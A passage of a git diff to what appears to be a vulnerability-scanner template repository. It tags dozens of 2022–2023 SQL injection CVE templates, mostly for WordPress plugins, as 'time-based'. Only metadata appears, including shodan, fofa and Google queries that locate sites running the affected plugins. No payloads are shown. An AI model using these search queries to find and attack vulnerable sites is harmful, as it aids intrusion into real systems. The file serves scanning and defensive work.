time-based,cve2022,cve,wordpress,wp-plugin,wp,wpscan,popup-builder,sygnoos,sqli http: - raw: diff --git a/http/cves/2022/CVE-2022-0349.yaml b/http/cves/2022/CVE-2022-0349.yaml index 0e34f8719d..746c28c42d 100644 --- a/http/cves/2022/CVE-2022-0349.yaml +++ b/http/cves/2022/CVE-2022-0349.yaml @@ -30,7 +30,7 @@ info: vendor: wpdeveloper product: notificationx framework: wordpress - tags: cve,cve2022,wordpress,wp-plugin,wp,sqli,notificationx,wpscan,wpdeveloper + tags: time-based,cve,cve2022,wordpress,wp-plugin,wp,sqli,notificationx,wpscan,wpdeveloper http: - raw: diff --git a/http/cves/2022/CVE-2022-0412.yaml b/http/cves/2022/CVE-2022-0412.yaml index 7237f85616..e6534841d9 100644 --- a/http/cves/2022/CVE-2022-0412.yaml +++ b/http/cves/2022/CVE-2022-0412.yaml @@ -30,7 +30,7 @@ info: vendor: templateinvaders product: ti_woocommerce_wishlist framework: wordpress - tags: cve2022,cve,sqli,ti-woocommerce-wishlist,wpscan,woocommerce,wordpress,wp-plugin,wp,templateinvaders + tags: time-based,cve2022,cve,sqli,ti-woocommerce-wishlist,wpscan,woocommerce,wordpress,wp-plugin,wp,templateinvaders http: - raw: diff --git a/http/cves/2022/CVE-2022-0651.yaml b/http/cves/2022/CVE-2022-0651.yaml index 42e88e0bba..ee05a34997 100644 --- a/http/cves/2022/CVE-2022-0651.yaml +++ b/http/cves/2022/CVE-2022-0651.yaml @@ -31,7 +31,7 @@ info: fofa-query: body=/wp-content/plugins/wp-statistics/ publicwww-query: /wp-content/plugins/wp-statistics/ google-query: inurl:/wp-content/plugins/wp-statistics - tags: cve,cve2022,sqli,wp,wordpress,wp-plugin,wp-statistics,veronalabs + tags: time-based,cve,cve2022,sqli,wp,wordpress,wp-plugin,wp-statistics,veronalabs http: - raw: diff --git a/http/cves/2022/CVE-2022-0658.yaml b/http/cves/2022/CVE-2022-0658.yaml index f256e9836c..b714517af1 100644 --- a/http/cves/2022/CVE-2022-0658.yaml +++ b/http/cves/2022/CVE-2022-0658.yaml @@ -27,7 +27,7 @@ info: product: commonsbooking framework: wordpress google-query: inurl:/wp-content/plugin/commonsbooking/ - tags: cve,cve2022,wordpress,wp-plugin,wp,commonsbooking,sqli,wpscan,wielebenwir + tags: time-based,cve,cve2022,wordpress,wp-plugin,wp,commonsbooking,sqli,wpscan,wielebenwir http: - raw: diff --git a/http/cves/2022/CVE-2022-0693.yaml b/http/cves/2022/CVE-2022-0693.yaml index c90a2d731c..c3bf42b592 100644 --- a/http/cves/2022/CVE-2022-0693.yaml +++ b/http/cves/2022/CVE-2022-0693.yaml @@ -30,7 +30,7 @@ info: vendor: devbunch product: master_elements framework: wordpress - tags: cve2022,cve,unauth,wpscan,wp-plugin,wp,sqli,wordpress,master-elements,devbunch + tags: time-based,cve2022,cve,unauth,wpscan,wp-plugin,wp,sqli,wordpress,master-elements,devbunch http: - raw: diff --git a/http/cves/2022/CVE-2022-0747.yaml b/http/cves/2022/CVE-2022-0747.yaml index 91dc1bd0c2..04f54f4175 100644 --- a/http/cves/2022/CVE-2022-0747.yaml +++ b/http/cves/2022/CVE-2022-0747.yaml @@ -29,7 +29,7 @@ info: vendor: quantumcloud product: infographic_maker framework: wordpress - tags: cve,cve2022,sqli,wordpress,wp-plugin,wp,infographic-and-list-builder-ilist,wpscan,quantumcloud + tags: time-based,cve,cve2022,sqli,wordpress,wp-plugin,wp,infographic-and-list-builder-ilist,wpscan,quantumcloud http: - raw: diff --git a/http/cves/2022/CVE-2022-0760.yaml b/http/cves/2022/CVE-2022-0760.yaml index 1d9a8d2123..3ea68cc374 100644 --- a/http/cves/2022/CVE-2022-0760.yaml +++ b/http/cves/2022/CVE-2022-0760.yaml @@ -30,7 +30,7 @@ info: vendor: quantumcloud product: simple_link_directory framework: wordpress - tags: cve,cve2022,sqli,wordpress,wp-plugin,wp,simple-link-directory,unauth,wpscan,quantumcloud + tags: time-based,cve,cve2022,sqli,wordpress,wp-plugin,wp,simple-link-directory,unauth,wpscan,quantumcloud http: - raw: diff --git a/http/cves/2022/CVE-2022-0769.yaml b/http/cves/2022/CVE-2022-0769.yaml index bcd8a6a5d5..122e57dc11 100644 --- a/http/cves/2022/CVE-2022-0769.yaml +++ b/http/cves/2022/CVE-2022-0769.yaml @@ -30,7 +30,7 @@ info: vendor: usersultra product: users_ultra framework: wordpress - tags: cve,cve2022,wp,users-ultra,wpscan,sqli,wordpress,wp-plugin,usersultra + tags: time-based,cve,cve2022,wp,users-ultra,wpscan,sqli,wordpress,wp-plugin,usersultra http: - raw: diff --git a/http/cves/2022/CVE-2022-0773.yaml b/http/cves/2022/CVE-2022-0773.yaml index 466a26aa73..dac85971a4 100644 --- a/http/cves/2022/CVE-2022-0773.yaml +++ b/http/cves/2022/CVE-2022-0773.yaml @@ -28,7 +28,7 @@ info: vendor: documentor_project product: documentor framework: wordpress - tags: cve2022,cve,unauth,sqli,wp-plugin,wp,documentor-lite,wpscan,wordpress,documentor_project + tags: time-based,cve2022,cve,unauth,sqli,wp-plugin,wp,documentor-lite,wpscan,wordpress,documentor_project http: - raw: diff --git a/http/cves/2022/CVE-2022-0784.yaml b/http/cves/2022/CVE-2022-0784.yaml index 9dd5ab1005..a126d03354 100644 --- a/http/cves/2022/CVE-2022-0784.yaml +++ b/http/cves/2022/CVE-2022-0784.yaml @@ -30,7 +30,7 @@ info: vendor: title_experiments_free_project product: title_experiments_free framework: wordpress - tags: cve2022,cve,wpscan,wp-plugin,wp,sqli,wp-experiments-free,unauth,wordpress,title_experiments_free_project + tags: time-based,cve2022,cve,wpscan,wp-plugin,wp,sqli,wp-experiments-free,unauth,wordpress,title_experiments_free_project http: - raw: diff --git a/http/cves/2022/CVE-2022-0785.yaml b/http/cves/2022/CVE-2022-0785.yaml index 60f114071f..1ea38cad7e 100644 --- a/http/cves/2022/CVE-2022-0785.yaml +++ b/http/cves/2022/CVE-2022-0785.yaml @@ -30,7 +30,7 @@ info: vendor: daily_prayer_time_project product: daily_prayer_time framework: wordpress - tags: cve2022,cve,sqli,wordpress,wp-plugin,unauth,daily-prayer-time-for-mosques,wpscan,wp,daily_prayer_time_project + tags: time-based,cve2022,cve,sqli,wordpress,wp-plugin,unauth,daily-prayer-time-for-mosques,wpscan,wp,daily_prayer_time_project http: - raw: diff --git a/http/cves/2022/CVE-2022-0786.yaml b/http/cves/2022/CVE-2022-0786.yaml index 937ff593aa..3ac92d8cc3 100644 --- a/http/cves/2022/CVE-2022-0786.yaml +++ b/http/cves/2022/CVE-2022-0786.yaml @@ -30,7 +30,7 @@ info: vendor: iqonic product: kivicare framework: wordpress - tags: cve,cve2022,sqli,kivicare-clinic-management-system,unauth,wordpress,wp-plugin,wp,wpscan,iqonic + tags: time-based,cve,cve2022,sqli,kivicare-clinic-management-system,unauth,wordpress,wp-plugin,wp,wpscan,iqonic http: - raw: diff --git a/http/cves/2022/CVE-2022-0787.yaml b/http/cves/2022/CVE-2022-0787.yaml index a727c46818..e34b703e26 100644 --- a/http/cves/2022/CVE-2022-0787.yaml +++ b/http/cves/2022/CVE-2022-0787.yaml @@ -26,7 +26,7 @@ info: vendor: limit_login_attempts_project product: limit_login_attempts framework: wordpress - tags: cve,cve2022,wpscan,sqli,wordpress,wp-plugin,wp,wp-limit-failed-login-attempts,limit_login_attempts_project + tags: time-based,cve,cve2022,wpscan,sqli,wordpress,wp-plugin,wp,wp-limit-failed-login-attempts,limit_login_attempts_project http: - raw: diff --git a/http/cves/2022/CVE-2022-0788.yaml b/http/cves/2022/CVE-2022-0788.yaml index fc98b5ed2a..1264ca0b5c 100644 --- a/http/cves/2022/CVE-2022-0788.yaml +++ b/http/cves/2022/CVE-2022-0788.yaml @@ -30,7 +30,7 @@ info: vendor: wpmet product: wp_fundraising_donation_and_crowdfunding_platform framework: wordpress - tags: cve,cve2022,sqli,wordpress,wp-plugin,wp,wp-fundraising-donation,unauth,wpscan,wpmet + tags: time-based,cve,cve2022,sqli,wordpress,wp-plugin,wp,wp-fundraising-donation,unauth,wpscan,wpmet http: - raw: diff --git a/http/cves/2022/CVE-2022-0826.yaml b/http/cves/2022/CVE-2022-0826.yaml index 9e3163229f..27db049a13 100644 --- a/http/cves/2022/CVE-2022-0826.yaml +++ b/http/cves/2022/CVE-2022-0826.yaml @@ -30,7 +30,7 @@ info: vendor: wp-video-gallery-free_project product: wp-video-gallery-free framework: wordpress - tags: cve,cve2022,wp-plugin,wpscan,wordpress,wp,sqli,wp-video-gallery-free,unauth,wp-video-gallery-free_project + tags: time-based,cve,cve2022,wp-plugin,wpscan,wordpress,wp,sqli,wp-video-gallery-free,unauth,wp-video-gallery-free_project http: - raw: diff --git a/http/cves/2022/CVE-2022-0827.yaml b/http/cves/2022/CVE-2022-0827.yaml index 8703340f0b..1167fc435d 100644 --- a/http/cves/2022/CVE-2022-0827.yaml +++ b/http/cves/2022/CVE-2022-0827.yaml @@ -30,7 +30,7 @@ info: vendor: presspage product: bestbooks framework: wordpress - tags: cve,cve2022,sqli,wpscan,wordpress,wp-plugin,wp,bestbooks,unauthenticated,presspage + tags: time-based,cve,cve2022,sqli,wpscan,wordpress,wp-plugin,wp,bestbooks,unauthenticated,presspage http: - raw: diff --git a/http/cves/2022/CVE-2022-0846.yaml b/http/cves/2022/CVE-2022-0846.yaml index 9d8b1a34bf..9b5a838ab7 100644 --- a/http/cves/2022/CVE-2022-0846.yaml +++ b/http/cves/2022/CVE-2022-0846.yaml @@ -29,7 +29,7 @@ info: vendor: speakout\!_email_petitions_project product: speakout\!_email_petitions framework: wordpress - tags: cve,cve2022,wordpress,wp-plugin,wp,unauth,wpscan,sqli,speakout,speakout-email-petitions,speakout\!_email_petitions_project + tags: time-based,cve,cve2022,wordpress,wp-plugin,wp,unauth,wpscan,sqli,speakout,speakout-email-petitions,speakout\!_email_petitions_project http: - raw: diff --git a/http/cves/2022/CVE-2022-0867.yaml b/http/cves/2022/CVE-2022-0867.yaml index c320da682e..a65f4a5701 100644 --- a/http/cves/2022/CVE-2022-0867.yaml +++ b/http/cves/2022/CVE-2022-0867.yaml @@ -30,7 +30,7 @@ info: vendor: reputeinfosystems product: pricing_table framework: wordpress - tags: cve,cve2022,unauth,wp,wordpress,wp-plugin,arprice-responsive-pricing-table,sqli,wpscan,reputeinfosystems + tags: time-based,cve,cve2022,unauth,wp,wordpress,wp-plugin,arprice-responsive-pricing-table,sqli,wpscan,reputeinfosystems http: - raw: diff --git a/http/cves/2022/CVE-2022-0948.yaml b/http/cves/2022/CVE-2022-0948.yaml index b34f57ff86..e4fc9db00a 100644 --- a/http/cves/2022/CVE-2022-0948.yaml +++ b/http/cves/2022/CVE-2022-0948.yaml @@ -30,7 +30,7 @@ info: vendor: pluginbazaar product: order_listener_for_woocommerce framework: wordpress - tags: cve,cve2022,wp,unauth,sqli,woc-order-alert,wpscan,wordpress,wp-plugin,pluginbazaar + tags: time-based,cve,cve2022,wp,unauth,sqli,woc-order-alert,wpscan,wordpress,wp-plugin,pluginbazaar http: - raw: diff --git a/http/cves/2022/CVE-2022-0949.yaml b/http/cves/2022/CVE-2022-0949.yaml index 5893e57577..591fc55360 100644 --- a/http/cves/2022/CVE-2022-0949.yaml +++ b/http/cves/2022/CVE-2022-0949.yaml @@ -29,7 +29,7 @@ info: vendor: stopbadbots product: block_and_stop_bad_bots framework: wordpress - tags: cve,cve2022,stopbadbots,wp-plugin,wp,unauth,wpscan,sqli,wordpress + tags: time-based,cve,cve2022,stopbadbots,wp-plugin,wp,unauth,wpscan,sqli,wordpress variables: IP: '{{rand_ip("1.1.1.0/24")}}' diff --git a/http/cves/2022/CVE-2022-1013.yaml b/http/cves/2022/CVE-2022-1013.yaml index bfd1c9bd18..6ec84641ec 100644 --- a/http/cves/2022/CVE-2022-1013.yaml +++ b/http/cves/2022/CVE-2022-1013.yaml @@ -29,7 +29,7 @@ info: vendor: ays-pro product: personal_dictionary framework: wordpress - tags: cve,cve2022,wp,unauth,wpscan,sqli,wordpress,wp-plugin,personal-dictionary,ays-pro + tags: time-based,cve,cve2022,wp,unauth,wpscan,sqli,wordpress,wp-plugin,personal-dictionary,ays-pro http: - raw: diff --git a/http/cves/2022/CVE-2022-1057.yaml b/http/cves/2022/CVE-2022-1057.yaml index b2038f69ec..1c58978fd4 100644 --- a/http/cves/2022/CVE-2022-1057.yaml +++ b/http/cves/2022/CVE-2022-1057.yaml @@ -30,7 +30,7 @@ info: vendor: varktech product: pricing_deals_for_woocommerce framework: wordpress - tags: cve,cve2022,sqli,wpscan,wordpress,wp-plugin,wp,pricing-deals-for-woocommerce,unauth,varktech + tags: time-based,cve,cve2022,sqli,wpscan,wordpress,wp-plugin,wp,pricing-deals-for-woocommerce,unauth,varktech http: - raw: diff --git a/http/cves/2022/CVE-2022-1768.yaml b/http/cves/2022/CVE-2022-1768.yaml index a8ade8e791..c07e4ef97f 100644 --- a/http/cves/2022/CVE-2022-1768.yaml +++ b/http/cves/2022/CVE-2022-1768.yaml @@ -30,7 +30,7 @@ info: vendor: carrcommunications product: rsvpmaker framework: wordpress - tags: cve,cve2022,wordpress,wp-plugin,wp,sqli,rsvpmaker,carrcommunications + tags: time-based,cve,cve2022,wordpress,wp-plugin,wp,sqli,rsvpmaker,carrcommunications http: - raw: diff --git a/http/cves/2022/CVE-2022-1883.yaml b/http/cves/2022/CVE-2022-1883.yaml index 1c1062c2fb..21846e5778 100644 --- a/http/cves/2022/CVE-2022-1883.yaml +++ b/http/cves/2022/CVE-2022-1883.yaml @@ -28,7 +28,7 @@ info: max-request: 1 vendor: camptocamp product: terraboard - tags: cve,cve2022,terraboard,sqli,huntr,camptocamp + tags: time-based,cve,cve2022,terraboard,sqli,huntr,camptocamp http: - raw: diff --git a/http/cves/2022/CVE-2022-22897.yaml b/http/cves/2022/CVE-2022-22897.yaml index a09ca65c2e..3da520ec18 100644 --- a/http/cves/2022/CVE-2022-22897.yaml +++ b/http/cves/2022/CVE-2022-22897.yaml @@ -31,7 +31,7 @@ info: shodan-query: - "http.component:\"Prestashop\"" - http.component:"prestashop" - tags: cve,cve2022,packetstorm,prestashop,sqli,unauth,apollotheme + tags: time-based,cve,cve2022,packetstorm,prestashop,sqli,unauth,apollotheme http: - raw: diff --git a/http/cves/2022/CVE-2022-24223.yaml b/http/cves/2022/CVE-2022-24223.yaml index 50d11c14b2..8a6b4070e9 100644 --- a/http/cves/2022/CVE-2022-24223.yaml +++ b/http/cves/2022/CVE-2022-24223.yaml @@ -28,7 +28,7 @@ info: max-request: 1 vendor: thedigitalcraft product: atomcms - tags: cve,cve2022,packetstorm,sqli,atom,cms,thedigitalcraft + tags: time-based,cve,cve2022,packetstorm,sqli,atom,cms,thedigitalcraft http: - raw: diff --git a/http/cves/2022/CVE-2022-24265.yaml b/http/cves/2022/CVE-2022-24265.yaml index 9fb0696a2e..04d0a672c1 100644 --- a/http/cves/2022/CVE-2022-24265.yaml +++ b/http/cves/2022/CVE-2022-24265.yaml @@ -29,7 +29,7 @@ info: max-request: 2 vendor: cuppacms product: cuppacms - tags: cve2022,cve,sqli,cuppa,authenticated,cuppacms + tags: time-based,cve2022,cve,sqli,cuppa,authenticated,cuppacms http: - raw: diff --git a/http/cves/2022/CVE-2022-24266.yaml b/http/cves/2022/CVE-2022-24266.yaml index 26669ff40e..1ae7115add 100644 --- a/http/cves/2022/CVE-2022-24266.yaml +++ b/http/cves/2022/CVE-2022-24266.yaml @@ -29,7 +29,7 @@ info: max-request: 2 vendor: cuppacms product: cuppacms - tags: cve,cve2022,sqli,cuppa,authenticated,cuppacms + tags: time-based,cve,cve2022,sqli,cuppa,authenticated,cuppacms http: - raw: diff --git a/http/cves/2022/CVE-2022-2467.yaml b/http/cves/2022/CVE-2022-2467.yaml index 17675e9e2e..823773f984 100644 --- a/http/cves/2022/CVE-2022-2467.yaml +++ b/http/cves/2022/CVE-2022-2467.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: garage_management_system_project product: garage_management_system - tags: cve,cve2022,sourcecodester,garagemanagementsystem,sqli,garage_management_system_project + tags: time-based,cve,cve2022,sourcecodester,garagemanagementsystem,sqli,garage_management_system_project http: - raw: diff --git a/http/cves/2022/CVE-2022-25148.yaml b/http/cves/2022/CVE-2022-25148.yaml index 909a8a147d..10389dd1b5 100644 --- a/http/cves/2022/CVE-2022-25148.yaml +++ b/http/cves/2022/CVE-2022-25148.yaml @@ -31,7 +31,7 @@ info: fofa-query: body=/wp-content/plugins/wp-statistics/ publicwww-query: /wp-content/plugins/wp-statistics/ google-query: inurl:/wp-content/plugins/wp-statistics - tags: cve,cve2022,packetstorm,sqli,wpscan,wordpress,wp-plugin,wp,wp-statistics,veronalabs + tags: time-based,cve,cve2022,packetstorm,sqli,wpscan,wordpress,wp-plugin,wp,wp-statistics,veronalabs http: - raw: diff --git a/http/cves/2022/CVE-2022-25149.yaml b/http/cves/2022/CVE-2022-25149.yaml index d9afc94118..1c279e67a5 100644 --- a/http/cves/2022/CVE-2022-25149.yaml +++ b/http/cves/2022/CVE-2022-25149.yaml @@ -30,7 +30,7 @@ info: fofa-query: body=/wp-content/plugins/wp-statistics/ publicwww-query: "/wp-content/plugins/wp-statistics/" google-query: inurl:/wp-content/plugins/wp-statistics - tags: cve2022,cve,sqli,wpscan,wordpress,wp-plugin,wp,wp-statistics,veronalabs + tags: time-based,cve2022,cve,sqli,wpscan,wordpress,wp-plugin,wp,wp-statistics,veronalabs http: - raw: diff --git a/http/cves/2022/CVE-2022-27984.yaml b/http/cves/2022/CVE-2022-27984.yaml index de2ed356b9..3f7f52f5df 100644 --- a/http/cves/2022/CVE-2022-27984.yaml +++ b/http/cves/2022/CVE-2022-27984.yaml @@ -28,7 +28,7 @@ info: max-request: 2 vendor: cuppacms product: cuppacms - tags: cve,cve2022,sqli,cuppa,authenticated,cuppacms + tags: time-based,cve,cve2022,sqli,cuppa,authenticated,cuppacms http: - raw: diff --git a/http/cves/2022/CVE-2022-28032.yaml b/http/cves/2022/CVE-2022-28032.yaml index 0284ea0ab6..879e3277ac 100644 --- a/http/cves/2022/CVE-2022-28032.yaml +++ b/http/cves/2022/CVE-2022-28032.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: thedigitalcraft product: atomcms - tags: cve,cve2022,sqli,atom,cms,thedigitalcraft + tags: time-based,cve,cve2022,sqli,atom,cms,thedigitalcraft http: - raw: diff --git a/http/cves/2022/CVE-2022-3142.yaml b/http/cves/2022/CVE-2022-3142.yaml index 5f038f7eac..9ecc5024f5 100644 --- a/http/cves/2022/CVE-2022-3142.yaml +++ b/http/cves/2022/CVE-2022-3142.yaml @@ -30,7 +30,7 @@ info: shodan-query: http.html:/wp-content/plugins/nex-forms-express-wp-form-builder/ fofa-query: body=/wp-content/plugins/nex-forms-express-wp-form-builder/ publicwww-query: /wp-content/plugins/nex-forms-express-wp-form-builder/ - tags: cve,cve2022,wpscan,packetstorm,wordpress,sqli,wp-plugin,wp,authenticated,basixonline + tags: time-based,cve,cve2022,wpscan,packetstorm,wordpress,sqli,wp-plugin,wp,authenticated,basixonline http: - raw: diff --git a/http/cves/2022/CVE-2022-31499.yaml b/http/cves/2022/CVE-2022-31499.yaml index 40f3c340af..fbadaa25a8 100644 --- a/http/cves/2022/CVE-2022-31499.yaml +++ b/http/cves/2022/CVE-2022-31499.yaml @@ -39,7 +39,7 @@ info: google-query: - intitle:"linear emerge" - intitle:"emerge" - tags: cve,cve2022,packetstorm,emerge,rce,nortekcontrol + tags: time-based,cve,cve2022,packetstorm,emerge,rce,nortekcontrol http: - raw: diff --git a/http/cves/2022/CVE-2022-31976.yaml b/http/cves/2022/CVE-2022-31976.yaml index ec141727a6..57fdd25599 100644 --- a/http/cves/2022/CVE-2022-31976.yaml +++ b/http/cves/2022/CVE-2022-31976.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: online_fire_reporting_system_project product: online_fire_reporting_system - tags: cve,cve2022,sqli,online-fire-reporting,online_fire_reporting_system_project + tags: time-based,cve,cve2022,sqli,online-fire-reporting,online_fire_reporting_system_project http: - raw: diff --git a/http/cves/2022/CVE-2022-31977.yaml b/http/cves/2022/CVE-2022-31977.yaml index 3c709a5b58..6efc570904 100644 --- a/http/cves/2022/CVE-2022-31977.yaml +++ b/http/cves/2022/CVE-2022-31977.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: online_fire_reporting_system_project product: online_fire_reporting_system - tags: cve,cve2022,sqli,online-fire-reporting,online_fire_reporting_system_project + tags: time-based,cve,cve2022,sqli,online-fire-reporting,online_fire_reporting_system_project http: - raw: diff --git a/http/cves/2022/CVE-2022-31978.yaml b/http/cves/2022/CVE-2022-31978.yaml index 7130952dc8..f9bbd3fe98 100644 --- a/http/cves/2022/CVE-2022-31978.yaml +++ b/http/cves/2022/CVE-2022-31978.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: online_fire_reporting_system_project product: online_fire_reporting_system - tags: cve,cve2022,sqli,online-fire-reporting,online_fire_reporting_system_project + tags: time-based,cve,cve2022,sqli,online-fire-reporting,online_fire_reporting_system_project http: - raw: diff --git a/http/cves/2022/CVE-2022-33965.yaml b/http/cves/2022/CVE-2022-33965.yaml index 416ca1f8f6..2701aef218 100644 --- a/http/cves/2022/CVE-2022-33965.yaml +++ b/http/cves/2022/CVE-2022-33965.yaml @@ -33,7 +33,7 @@ info: shodan-query: http.html:"wp-stats-manager" fofa-query: body="wp-stats-manager" google-query: inurl:"/wp-content/plugins/wp-stats-manager" - tags: cve2022,cve,wordpress,wp-plugin,wp,unauth,sqli,wp-stats-manager,plugins-market + tags: time-based,cve2022,cve,wordpress,wp-plugin,wp,unauth,sqli,wp-stats-manager,plugins-market http: - raw: diff --git a/http/cves/2022/CVE-2022-3768.yaml b/http/cves/2022/CVE-2022-3768.yaml index 1ef5966e7a..100346d080 100644 --- a/http/cves/2022/CVE-2022-3768.yaml +++ b/http/cves/2022/CVE-2022-3768.yaml @@ -29,7 +29,7 @@ info: vendor: wpsmartcontracts product: wpsmartcontracts framework: wordpress - tags: cve,cve2022,wp-smart-contracts,wpscan,wp-plugin,sqli,wordpress,wp,authenticated,wpsmartcontracts + tags: time-based,cve,cve2022,wp-smart-contracts,wpscan,wp-plugin,sqli,wordpress,wp,authenticated,wpsmartcontracts http: - raw: diff --git a/http/cves/2022/CVE-2022-3800.yaml b/http/cves/2022/CVE-2022-3800.yaml index 4e9e42ac93..7d0914e32b 100644 --- a/http/cves/2022/CVE-2022-3800.yaml +++ b/http/cves/2022/CVE-2022-3800.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: ibax product: go-ibax - tags: cve2022,cve,ibax,go-ibax,sqli + tags: time-based,cve2022,cve,ibax,go-ibax,sqli http: - raw: diff --git a/http/cves/2022/CVE-2022-40032.yaml b/http/cves/2022/CVE-2022-40032.yaml index efebcce6f1..dbd896729d 100644 --- a/http/cves/2022/CVE-2022-40032.yaml +++ b/http/cves/2022/CVE-2022-40032.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: simple_task_managing_system_project product: simple_task_managing_system - tags: cve,cve2022,packetstorm,simple-task,stms,sqli,simple_task_managing_system_project + tags: time-based,cve,cve2022,packetstorm,simple-task,stms,sqli,simple_task_managing_system_project http: - raw: diff --git a/http/cves/2022/CVE-2022-4049.yaml b/http/cves/2022/CVE-2022-4049.yaml index d7de9e0abc..4a37fb4b28 100644 --- a/http/cves/2022/CVE-2022-4049.yaml +++ b/http/cves/2022/CVE-2022-4049.yaml @@ -28,7 +28,7 @@ info: shodan-query: http.html:/wp-content/plugins/wp-user/ fofa-query: body=/wp-content/plugins/wp-user/ publicwww-query: /wp-content/plugins/wp-user/ - tags: cve,cve2022,sqli,wpscan,wordpress,wp-plugin,wp,wp-user,unauth,wp_user_project + tags: time-based,cve,cve2022,sqli,wpscan,wordpress,wp-plugin,wp,wp-user,unauth,wp_user_project http: - raw: diff --git a/http/cves/2022/CVE-2022-4050.yaml b/http/cves/2022/CVE-2022-4050.yaml index ab421f05e9..12de61acfe 100644 --- a/http/cves/2022/CVE-2022-4050.yaml +++ b/http/cves/2022/CVE-2022-4050.yaml @@ -30,7 +30,7 @@ info: vendor: beardev product: joomsport framework: wordpress - tags: cve,cve2022,wpscan,wp-plugin,wp,joomsport-sports-league-results-management,wordpress,sqli,unauth,beardev + tags: time-based,cve,cve2022,wpscan,wp-plugin,wp,joomsport-sports-league-results-management,wordpress,sqli,unauth,beardev http: - raw: diff --git a/http/cves/2022/CVE-2022-4059.yaml b/http/cves/2022/CVE-2022-4059.yaml index 146a1d075b..e8cb84f659 100644 --- a/http/cves/2022/CVE-2022-4059.yaml +++ b/http/cves/2022/CVE-2022-4059.yaml @@ -28,7 +28,7 @@ info: shodan-query: http.html:/wp-content/plugins/cryptocurrency-widgets-pack/ fofa-query: body=/wp-content/plugins/cryptocurrency-widgets-pack/ publicwww-query: /wp-content/plugins/cryptocurrency-widgets-pack/ - tags: cve,cve2022,wp,wp-plugin,wordpress,wpscan,sqli,blocksera + tags: time-based,cve,cve2022,wp,wp-plugin,wordpress,wpscan,sqli,blocksera http: - raw: diff --git a/http/cves/2022/CVE-2022-4117.yaml b/http/cves/2022/CVE-2022-4117.yaml index 6396ed4103..ca6e099de9 100644 --- a/http/cves/2022/CVE-2022-4117.yaml +++ b/http/cves/2022/CVE-2022-4117.yaml @@ -30,7 +30,7 @@ info: vendor: iws-geo-form-fields_project product: iws-geo-form-fields framework: wordpress - tags: cve,cve2022,sqli,wordpress,wp-plugin,wp,iws-geo-form-fields,wpscan,iws-geo-form-fields_project + tags: time-based,cve,cve2022,sqli,wordpress,wp-plugin,wp,iws-geo-form-fields,wpscan,iws-geo-form-fields_project http: - raw: diff --git a/http/cves/2022/CVE-2022-44290.yaml b/http/cves/2022/CVE-2022-44290.yaml index 9900d63e5b..deedd1396a 100644 --- a/http/cves/2022/CVE-2022-44290.yaml +++ b/http/cves/2022/CVE-2022-44290.yaml @@ -24,7 +24,7 @@ info: max-request: 2 vendor: webtareas_project product: webtareas - tags: cve,cve2022,sqli,webtareas,authenticated,intrusive,webtareas_project + tags: time-based,cve,cve2022,sqli,webtareas,authenticated,intrusive,webtareas_project http: - raw: diff --git a/http/cves/2022/CVE-2022-44291.yaml b/http/cves/2022/CVE-2022-44291.yaml index 945f09a011..eb926999cb 100644 --- a/http/cves/2022/CVE-2022-44291.yaml +++ b/http/cves/2022/CVE-2022-44291.yaml @@ -24,7 +24,7 @@ info: max-request: 2 vendor: webtareas_project product: webtareas - tags: cve,cve2022,sqli,webtareas,authenticated,intrusive,webtareas_project + tags: time-based,cve,cve2022,sqli,webtareas,authenticated,intrusive,webtareas_project http: - raw: diff --git a/http/cves/2022/CVE-2022-45805.yaml b/http/cves/2022/CVE-2022-45805.yaml index 1f6eaad2f3..d4887a6353 100644 --- a/http/cves/2022/CVE-2022-45805.yaml +++ b/http/cves/2022/CVE-2022-45805.yaml @@ -29,7 +29,7 @@ info: vendor: paytm product: payment_gateway framework: wordpress - tags: cve,cve2022,sqli,wordpress,wp-plugin,wp,paytm-payments,authenticated,paytm + tags: time-based,cve,cve2022,sqli,wordpress,wp-plugin,wp,paytm-payments,authenticated,paytm http: - raw: diff --git a/http/cves/2023/CVE-2023-0261.yaml b/http/cves/2023/CVE-2023-0261.yaml index 2dce0985c1..fdeeec8675 100644 --- a/http/cves/2023/CVE-2023-0261.yaml +++ b/http/cves/2023/CVE-2023-0261.yaml @@ -28,7 +28,7 @@ info: vendor: ljapps product: wp_tripadvisor_review_slider framework: wordpress - tags: cve2023,cve,wordpress,wp,wp-tripadvisor-review-slider,auth,sqli,wp-plugin,wpscan,ljapps + tags: time-based,cve2023,cve,wordpress,wp,wp-tripadvisor-review-slider,auth,sqli,wp-plugin,wpscan,ljapps http: - raw: diff --git a/http/cves/2023/CVE-2023-0600.yaml b/http/cves/2023/CVE-2023-0600.yaml index 9d026d71d6..38a169edc1 100644 --- a/http/cves/2023/CVE-2023-0600.yaml +++ b/http/cves/2023/CVE-2023-0600.yaml @@ -29,7 +29,7 @@ info: fofa-query: body="wp-stats-manager" google-query: inurl:"/wp-content/plugins/wp-stats-manager" public-www: /wp-content/plugins/wp-stats-manager/ - tags: cve,cve2023,wp,wp-plugin,wordpress,wpscan,unauth,wp-stats-manager,sqli,plugins-market + tags: time-based,cve,cve2023,wp,wp-plugin,wordpress,wpscan,unauth,wp-stats-manager,sqli,plugins-market variables: str: '{{rand_int(100000, 999999)}}' diff --git a/http/cves/2023/CVE-2023-0630.yaml b/http/cves/2023/CVE-2023-0630.yaml index 6fc2d09aea..d9a32e13b5 100644 --- a/http/cves/2023/CVE-2023-0630.yaml +++ b/http/cves/2023/CVE-2023-0630.yaml @@ -29,7 +29,7 @@ info: vendor: wp-slimstat product: slimstat_analytics framework: wordpress - tags: cve2023,cve,wpscan,wp-slimstat,wp,wp-plugin,sqli,wordpress,authenticated + tags: time-based,cve2023,cve,wpscan,wp-slimstat,wp,wp-plugin,sqli,wordpress,authenticated http: - raw: diff --git a/http/cves/2023/CVE-2023-0900.yaml b/http/cves/2023/CVE-2023-0900.yaml index f57e933394..1c61c675ed 100644 --- a/http/cves/2023/CVE-2023-0900.yaml +++ b/http/cves/2023/CVE-2023-0900.yaml @@ -27,7 +27,7 @@ info: shodan-query: http.html:wp-content/plugins/ap-pricing-tables-lite fofa-query: body=wp-content/plugins/ap-pricing-tables-lite publicwww-query: "wp-content/plugins/ap-pricing-tables-lite" - tags: cve2023,cve,sqli,wordpress,wp-plugin,wp,authenticated,wpscan,ap-pricing-tables-lite,wpdevart + tags: 